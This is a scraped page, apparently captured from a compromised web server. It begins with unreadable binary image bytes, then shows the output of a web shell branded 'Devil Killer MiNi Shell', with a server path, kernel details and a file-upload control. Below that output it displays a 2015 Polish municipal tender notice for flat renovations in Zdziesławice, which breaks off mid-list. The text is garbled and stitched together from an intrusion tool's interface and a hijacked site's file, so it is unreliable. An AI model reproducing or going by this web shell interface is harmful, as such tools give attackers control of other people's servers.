JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150730/114089-N-2015.html

<p class="kh_header"><b>Jemielno: Remont lokali mieszkalnych w Zdziesławicach</b><br>
<b>Numer ogłoszenia: 114089 - 2015; data zamieszczenia: 30.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jemielno , Jemielno 81, 56-209 Jemielno, woj. dolnośląskie, tel. 065 5447479, faks 065 5447482.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jemielno.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont lokali mieszkalnych w Zdziesławicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont istniejących zamieszkałych lokali mieszkalnych w miejscowości Zdziesławice. Zakres robót budowlano - instalacyjnych w poszczególnych lokalach obejmuje:
1.1. Nr lokalu 10/18   
1.1.1. Wymianę istniejącej stolarki drewnianej na PCV wraz z nawiewnikami podciśnieniowymi , parapetami zewnętrznymi ,obróbką ościeży okiennych i malowaniem.
1.1.2.Poszerzenie  otworu  drzwiowego i wymiana istniejących drzwi wewnątrz klatkowych szer. 80 cm wraz z ościeżnicą  na drzwi wewnątrz klatkowe wzmocnione szer. 90  wyposażonych w dwa zamki z wkładkami  i klamkę.  
1.1.3.Demontaż , montaż  wewnętrznych skrzydeł drzwiowych  do pokoi ,kuchni  ,łazienki i wc na istniejących ościeżnicach metalowych wraz z ich regulacją i  pomalowaniem .  Skrzydła  drzwiowe do WC i łazienki winny być wyposażone w nawietrzaki u dołu oraz blokadę.
1.1.4.Demontaż , montaż nowego pieca z płytą grzewczą   o pow. do 4 m2 na paliwo stałe oraz podłączeniem do istniejącej instalacji i wymianą pompy obiegowej c.o. i c.w.  o wydajności Q max. 2,6 m3/h. 
1.1.5.Wymianę istniejących przewodów  aluminiowych  instalacji elektrycznej  na  przewody miedziane wraz z gniazdami , wyłącznikami prądu, tablicą bezpiecznikową, zakończeniem punktów  oświetleniowych  kostką i wykonaniem pomiarów. Instalację należy wymienić  we wszystkich pomieszczeniach lokalu.  
1.1.6.Malowanie wszystkich pomieszczeń ścian i sufitów wraz z przygotowaniem powierzchni  starych ścian : gruntowanie, szpachlowanie, uzupełnienie tynków.
1.1.7.Malowanie grzejników , rur co. naczynia wzbiorczego , balustrady balkonowej.
1.1.8.Ułożenie płytek ściennych   w  kuchni  przy zlewie oraz w łazience  przy wannie i  umywalce.
1.1.9. Wymianę istniejącej nawierzchni posadzek we wszystkich pomieszczeniach na posadzkę z wykładzin  sztucznych  rulonowych z warstwą izolacyjną  / w pokojach / oraz z płytek gresowych  lub szkliwionych   w kuchni , łazience  wc  i balkonie.
1.1.10.Demontaż, montaż  wraz z podłączeniem przyborów instalacji sanitarnej w tym miski ustępowej  z osprzętem , umywalki, baterii umywalkowej i zlewozmywakowej, baterii wannowej , wymianę części instalacji wodnej i cwu.
1.1.11.Sprawdzenie i udrożnienie przewodów wentylacyjnych i dymowego.
1.1.12.Prace porządkowe po wykonanych robotach  z wywiezieniem  i utylizacją gruzu , stolarki i okiennej drzwiowej itp.
1.2. Nr lokalu  10/3 
1.2.1. Wymianę istniejącej stolarki drewnianej na PCV wraz z nawiewnikami podciśnieniowymi , parapetami zewnętrznymi ,obróbką ościeży okiennych i malowaniem .
1.2.2.Poszerzenie  otworu  drzwiowego i wymiana istniejących drzwi wewnątrz klatkowych szer. 80 cm wraz z oscieznicą  na drzwi wewnątrz klatkowe wzmocnione szer. 90  wyposażonych w dwa zamki z wkładkami  i klamkę;  
1.2.3.Demontaż , montaż  wewnętrznych skrzydeł drzwiowych  do pokoi ,kuchni  ,łazienki i wc na istniejących ościeżnicach metalowych wraz z ich regulacją i  pomalowaniem .  Skrzydła  drzwiowe do WC i łazienki winny być wyposażone w nawietrzaki u dołu oraz blokadę.
1.2.4.Demontaż , montaż nowego pieca z płytą grzewczą   o pow. do 4 m2 na paliwo stałe oraz podłączeniem do istniejącej instalacji i wymianą pompy obiegowej c.o. i c.w.  o wydajności Q max. 2,6 m3/h .
1.2.5.Wymianę istniejących przewodów  aluminiowych  instalacji eklektycznej  na  przewody miedziane wraz z gniazdami , wyłącznikami prądu, tablicą bezpiecznikową, zakończeniem punktów  oświetleniowych  kostką i wykonaniem pomiarów. Instalację należy wymienić  we wszystkich pomieszczeniach lokalu.  
1.2.6. Malowanie wszystkich pomieszczeń ścian i sufitów wraz z przygotowaniem powierzchni  starych ścian : gruntowanie, szpachlowanie, uzupełnienie tynków.
1.2.7. Malowanie grzejników , rur co. naczynia wzbiorczego , balustrady balkonowej.
1.2.8. Ułożenie płytek ściennych   w  kuchni  przy zlewie , uzupełnienie płytek na ścianach w łazience oraz ułożenie płytek podłogowych w kuchni , wc i na balkonie .
1.2.9.Dementaż, montaż  wraz z podłączeniem przyborów instalacji sanitarnej w tym miski ustępowej z osprzętem , wymiana części instalacji wodnej i cwu i kanalizacyjnej .
1.2.10.Sprawdzenie i udrożnienie przewodów wentylacyjnych i dymowego.
1.2.12.Prace porządkowe po wykonanych robotach  z wywiezieniem  i utylizacją gruzu , stolarki i okiennej drzwiowej itp.

1.3.  Nr lokalu 11/15  
1.3.1.Wymianę istniejącej stolarki drewnianej na PCV wraz z nawiewnikami podciśnieniowymi , parapetami zewnętrznymi ,obróbką ościeży okiennych i malowaniem; z pominięciem jednego okna.
1.3.2.Poszerzenie  otworu  drzwiowego i wymiana istniejących drzwi wewnątrz klatkowych szer. 80 cm wraz z oscieznicą  na drzwi wewnątrz klatkowe wzmocnione szer. 90  wyposażonych w dwa zamki z wkładkami  i klamkę;  
1.3.3.Demontaż , montaż  wewnętrznych skrzydeł drzwiowych  do pokoi ,kuchni  ,łazienki i wc na istniejących osciezniach metalowych wraz z ich regulacją i  pomalowaniem .  Skrzydła  drzwiowe do WC i łazienki winny być wyposażone w nawietrzaki u dołu oraz blokadę.
1.3.4.Demontaż , montaż nowego kotła o mocy min. 12 kW  na paliwo stałe  oraz podłączeniem do istniejącej instalacji i wymianą pompy obiegowej c.o. i c.w.  o wydajności Q max. 2,6 m3/h. 
1.3.5.Wymianę  w części pomieszczeń  istniejących przewodów  aluminiowych  instalacji elektrycznej  na  przewody miedziane wraz z gniazdami , wyłącznikami prądu, tablicą bezpiecznikową, dwa pokoje i przedpokój 
1.3.6.Malowanie części  pomieszczeń ścian i sufitów wraz z przygotowaniem powierzchni  starych ścian : gruntowanie, szpachlowanie, uzupełnienie tynków z pominięciem kuchni, łazienki , wc i pokoi nie dotyczących wymiany instalacji elektrycznej.
1.3.7.Uzupełnienie części zdemontowanej bauzerii.
1.3.8.Malowanie, rur co. naczynia wyrównawczego , balustrady balkonowej.
1.3.9.Ułożenie płytek podłogowych wraz z cokolikiem na balkonie.
1.3.10.Sprawdzenie i udrożnienie przewodów wentylacyjnych i dymowego.
1.3.11.Prace porządkowe po wykonanych robotach  z wywiezieniem  i utylizacją gruzu , stolarki i okiennej drzwiowej itp.
1.4. Nr lokalu 11/7  
1.4.1.Wymianę istniejącej stolarki drewnianej na PCV wraz z nawiewnikami podciśnieniowymi , parapetami zewnętrznymi ,obróbką ościeży okiennych i malowaniem.
1.4.1.Poszerzenie  otworu  drzwiowego i wymiana istniejących drzwi wewnątrz klatkowych szer. 80 cm wraz z ościeżnicą  na drzwi wewnątrz klatkowe wzmocnione szer. 90  wyposażonych w dwa zamki z wkładkami  i klamkę.  
1.4.2.Demontaż , montaż  wewnętrznych skrzydeł drzwiowych  do pokoi ,kuchni  ,łazienki i wc na istniejących ościeżach  metalowych wraz z ich regulacją i  pomalowaniem .  Skrzydła  drzwiowe do WC i łazienki winny być wyposażone w nawietrzaki u dołu oraz blokadę.
1.4.3.Demontaż , montaż nowego kotła grzewczego   o mocy min. 12 kw na paliwo stałe  oraz podłączeniem do istniejącej instalacji i wymianą pompy obiegowej c.o. i c.w.  o wydajności Q max. 2,6 m3/h. 
1.4.4.Wymiana tablicy bezpiecznikowej wraz wykonaniem pomiarów. 
1.4.5.Wymiana nawierzchni posadzki na balkonie , malowanie powierzchni ścian i sufitów na balkonie oraz balustrady.
1.4.6.Demontaż starej i montaż nowej umywalki.
1.4.7.Sprawdzenie i udrożnienie przewodów wentylacyjnych i dymowego.
1.4.8.Prace porządkowe po wykonanych robotach  z wywiezieniem  i utylizacją gruzu , stolarki i okiennej drzwiowej itp.
1.5. Nr  4 budynku 
1.5.1.Wymiana istniejącej stolarki drewnianej na PCV wraz z nawiewnikami podciśnieniowymi , parapetami zewnętrznymi ,obróbką ościeży okiennych i malowaniem.
1.5.2.Poszerzenie  otworu  drzwiowego i wymiana istniejących drzwi wewnątrz klatkowych szer. 80 cm wraz z ościeżnicą  na drzwi wewnątrz klatkowe wzmocnione szer. 90  wyposażonych w dwa zamki z wkładkami  i klamkę. Montaż osłony drzwi wejściowych  z daszku  łukowego oraz ścianką boczną z profili aluminiowych wypełnionych płytami poliwęglanowymi. 
1.5.3.Demontaż , montaż  wewnętrznych skrzydeł drzwiowych  do pokoi ,kuchni  ,łazienki  i pomieszczenia gospodarczego  na istniejących ościeżnicach metalowych wraz z ich regulacją i  pomalowaniem . Skrzydła  drzwiowe do łazienki winny być wyposażone w nawietrzaki u dołu oraz blokadę.
1.5.4.Wymiana instalacji c.o. na instalację c.o. i cwu z rur miedzianych  oraz wymianą  grzejników, montażem ,  nowego pieca z płytą grzewczą   o pow. do 4 m2 , pompą obiegową  c.o. i c.w.  o wydajności Q max. 2,6 m3/h i zbiornika wyrównawczego.
1.5.5.Wymiana istniejących przewodów  aluminiowych  instalacji elektrycznej  na  przewody miedziane wraz z gniazdami , wyłącznikami prądu, tablicą bezpiecznikową, zakończeniem punktów  oświetleniowych  kostką i wykonaniem pomiarów. Instalację należy wymienić  we wszystkich pomieszczeniach lokalu.  
1.5.6.Malowanie wszystkich pomieszczeń ścian i sufitów wraz z przygotowaniem powierzchni  starych ścian tj.  gruntowanie, szpachlowanie, uzupełnienie tynków, wykonanie m okładzin z płyt gkb na stropach we wszystkich pomieszczeniach.
1.5.7.Ułożenie płytek ściennych   w  kuchni  i uzupełnienie płytek w łazience . 
1.5.8. Wymiana istniejącej nawierzchni posadzek we wszystkich pomieszczeniach na posadzkę z wykładzin  sztucznych  rulonowych z warstwą izolacyjną  / w pokojach / oraz z płytek gresowych  lub szkliwionych   w kuchni  i pomieszczeniu gospodarczym oraz wymianą białych podłóg z desek podłogowych w pokojach wraz  listwami  progowymi .
1.5.9.Sprawdzenie i udrożnienie przewodów wentylacyjnych i dymowego oraz wykonanie wentylacji wywiewnej i nawiewnej w kuchni i łazience.
1.5.10.Prace porządkowe po wykonanych robotach  z wywiezieniem  i utylizacją gruzu , stolarki i okiennej i drzwiowej itp.
2. Szczegółowy zakres robót i sposób ich wykonania stanowiący opis przedmiotu zamówienia został określony  za pomocą przedmiaru robót wraz z kosztorysem ofertowym, stanowiącymi załączniki do niniejszej SIWZ.

3.Wykonawca przy realizacji robót budowlanych zobowiązany będzie do :
3.1.Stosowania wyrobów budowlanych wprowadzonych  do obrotu na zasadach określonych w ustawie  z dnia 16 kwietnia 2004r.  o wyrobach  budowlanych (Dz. U z 2014 poz. 883).
Zamawiający dopuszcza stosowanie materiałów i urządzeń technicznych  oraz elementów  wyposażenia równoważnych  opisanych w przedmiarze robót.
Wykonawca który powoła się na rozwiązania równoważne opisane przez Zamawiające  jest obowiązany wykazać, że oferowane przez niego materiały, urządzenia techniczne i elementy wyposażenia spełniają wymagania określone przez Zmawiającego  oraz uzyskać Akceptację  Zamawiajacego.
W przypadku gdy została wskazana w przedmiarze robót nazwa handlowa  lub znak towarowy materiału urządzenia technicznego  lub elementu wyposażenia , to charakteryzujące tak opisany materiał , urządzenie lub element wyposażenia , jego parametry i cechy techniczne oraz posiadane atesty i certyfikaty stanowią warunek równoważności  dla rozwiązań zamiennych.
3.2.Zagospodarowania powstałych podczas prowadzenia robót. Utylizację należy przeprowadzić zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach / Dz. U z 2013 poz. 21 ze zmianami/ 
3.3.Wykonywania robót budowlanych  przy zamieszkałych lokalach.
3.4. Wykonywania przedmiotu zamówienia zgodnie z obowiązującymi przepisami prawa budowlanego, przy pomocy osób posiadających  odpowiednie kwalifikacje i uprawnienia oraz wyposażonych  w odpowiedni sprzęt i narzędzia.
3.5.Zorganizowia i przeprowadzenia  niezbędnych prób , pomiarów badań i odbiorów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7, 45.31.10.00-3, 45.33.00.00-9, 45.21.11.10-5, 45.41.10.00-4, 45.43.10.00-7, 45.43.21.10-8, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę  wiedzy i doświadczenia do oferty dołączyć należy:
Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed  upływem terminu składania  ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Spełnieniem warunku będzie wykonanie co najmniej jednej roboty polegającej na budowie, remoncie, adaptacji ,  modernizacji  obiektu budowlanego o wartości nie mniejszej niż  j niż 150.000,00 zł brutto.Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie.Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:
Wykaz  osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych ,doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami wg wzoru stanowiącego załącznik  Nr  5;
Potwierdzeniem spełnienia warunku będzie :
- jedna osoba z uprawnieniami do kierowania robotami budowlanymi o specjalności uprawnień konstrukcyjno-budowlanej.Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia
 

Wskazana osoba winna przedłożyć wraz z uprawnieniami, oświadczenie potwierdzające wpis na listę członków właściwej izby samorządu zawodowego na rok 2015;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę  wiedzy i doświadczenia do oferty dołączyć należy:
Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed  upływem terminu składania  ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Spełnieniem warunku będzie wykonanie co najmniej jednej roboty polegającej na budowie, remoncie, adaptacji ,  modernizacji  obiektu budowlanego o wartości nie mniejszej niż  j niż 150.000,00 zł brutto. Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
